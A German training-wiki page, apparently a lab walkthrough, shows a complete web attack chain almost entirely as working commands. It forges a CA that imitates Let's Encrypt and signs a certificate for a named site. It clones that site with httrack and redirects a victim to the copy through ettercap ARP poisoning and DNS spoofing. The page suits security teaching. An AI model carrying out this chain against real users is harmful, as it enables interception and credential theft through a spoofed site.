Komplette Angriffskette Web Server
Version vom 17. August 2026, 18:39 Uhr von Thomas.will (Diskussion | Beiträge) (→Zertifikate an die richtige Stelle bringen)
Wie wollen Letsencrypt nachbauen
- CA=fake-ca
- openssl req -new -x509 -newkey rsa:4096 -nodes -keyout $CA.key -out $CA.crt -days 3650 -subj "/CN=R12 /O=Let's Encrypt /C=US"
Wir wollen ein Xinux Zertifikat erstellen
- Variable gesetzt
- FQDN=www.zweebrigge.de
- Request erstellt
- openssl req -new -newkey rsa:4096 -nodes -keyout $FQDN.key -out $FQDN.csr -subj "/CN=$FQDN"
- Signiert
- openssl x509 -req -days 1460 -in $FQDN.csr -CA $CA.crt -CAkey $CA.key -CAcreateserial -out $FQDN.crt -extfile <(echo "subjectAltName=DNS:$FQDN")
Zertifikate an die richtige Stelle bringen
- Zertifikat der Zertifizierungsstelle zu den Stammzertifikaten der OS hinzufügen.
- sudo cp $CA.crt /usr/local/share/ca-certificates
- sudo update-ca-certificates
Zertifikat und Key des Webservers an die richtige Stelle bringen
- sudo cp $FQDN.crt /etc/apache2/own.crt
- sudo cp $FQDN.key /etc/apache2/own.key
Apache einrichten
- SSL aktivieren
- a2enmod ssl
- Konfiguration
- cat /etc/apache2/sites-enabled/000-default.conf
<IfModule mod_ssl.c>
<VirtualHost *:443>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
SSLEngine on
SSLCertificateFile /etc/apache2/own.crt
SSLCertificateKeyFile /etc/apache2/own.key
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
</IfModule>
- Restart
- sudo systemctl restart apache2
- Check
- sudo ss -lntp | grep 443
LISTEN 0 511 *:443 *:* users: (("apache2",pid=324865,fd=6),("apache2",pid=324864,fd=6), ("apache2",pid=324863,fd=6),("apache2",pid=324862,fd=6),("apache2",pid=324861,fd=6),("apache2",pid=44955,fd=6))
Wir spielen den Angriff auf kali einmal durch
- Hosts für die Simulation vorbereiten
- echo 127.0.0.1 $FQDN | sudo tee -a /etc/hosts
- Fake CA-Zertifkat zu den Stammzertifikaten in Firefox hinzufügen.
Webseite spiegeln
- cd /var/www/html
- rm -r *
- httrack https://www.zweebrigge.de
- mv www.zweebrigge.de/* .
- rm -r www.zweebrigge.de
host anlegen
- echo -e "$FQDN A 10.0.10.101" > /etc/ettercap/etter.dns
ettercap mit dns plugin starten
- OPFER=10.0.10.102
- ANGREIFER=10.0.10.101
- ettercap -Tq -i eth0 -M arp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER//
OPFER
- nslookup www.zweebrigge.de
Server: 192.168.16.254 Address: 192.168.16.254#53
Non-authoritative answer: Name: $FQDN Address: 10.0.10.101